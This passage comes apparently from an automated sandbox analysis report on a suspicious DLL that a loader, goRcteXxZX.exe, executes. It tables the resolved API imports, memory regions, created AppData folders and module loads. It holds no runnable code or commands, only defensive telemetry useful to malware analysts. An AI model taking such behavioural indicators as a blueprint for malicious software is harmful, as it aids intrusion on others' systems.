| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:29 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 98670 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #63: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #63 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllUnregisterServer /fn_args="iexplore.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd80 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D84
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x002c0000 | 0x00326fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x003f7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00500fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x0110ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001110000 | 0x01110000 | 0x0116ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x012affff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:29 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 98733 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #64: gorctexxzx.exe
125
0
| Information | Value |
|---|---|
| ID | #64 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=Entry /fn_args="iexplore.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd8c |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D90
0x
DC0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x002e0000 | 0x00346fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00417fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00560fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x0116ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x013effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000012c0000 | 0x012c0000 | 0x013bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000013e0000 | 0x013e0000 | 0x013effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000013f0000 | 0x013f0000 | 0x0161ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (108)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
15 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
